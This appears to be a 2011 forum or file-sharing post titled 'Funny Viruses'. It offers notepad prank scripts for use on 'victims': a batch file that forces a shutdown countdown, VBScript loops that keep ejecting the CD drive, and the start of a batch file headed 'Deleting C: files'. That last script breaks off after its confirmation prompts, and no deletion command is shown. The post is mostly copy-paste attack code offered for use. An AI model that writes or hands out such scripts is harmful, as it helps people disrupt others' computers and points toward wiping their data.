Site menu |
| |
|
Seksioni kategoris |
| |
|
Bookmark website |
| |
|
Sondazhi Yne |
| |
|
Statistika |
|
Total online: 1 Guests: 1 Users: 0 |
|
|
| | |
|
FUNNY VIRUSES
| 01.05.2011, 8:20 PM |
I will show you a way to make some funny viruses with a notepad. Lets start! 1. Most common virus trick: Type at notepad the following code and save it as a .bat file!Code:
shutdown -s -t 600 -c "[i]Your message here.[/i]"
This will appear a message saying what you typed and starts a countdown that u choose from selection -t and then computer will shutdown. You can stop it by typing at RUN shutdown -a
2.Driver trick Open notepad and type in the following codeCode:
do
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
End If
loop
Save it as NameYouWant.vbs This will make victims driver open! Even if he closes it driver will open again! If you want to stop it open task manager and end wscript at processes.
3.Driver trick 2 Once again open notepad and type in the codeCode:
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom loop
End If
Save it as NameYouWant.vbs and run it. This will make your driver come out and then come in again. It has an infinite loop so it will never stop. You can stop it from task manager processes wscript.
4.Deleting C: files. Same here C/P code at a notepad and save it as a .bat file.Code:
@echo off
A:
cls
Echo Do You Want to Wipe all Your Computer's Data? (Y/N)
pause
Echo Are You Sure You Want to Delete all Files? (Y/N)
|
Category: My files | Added by: albanian-hacker
|
Views: 688 | Downloads: 0
| Rating: 5.0/1 |
| |
| |
| | |
|
Kerko |
| |
|
Share Website |
| |
|
Upload your files |
| |
|
VIDEO |
| |
|
|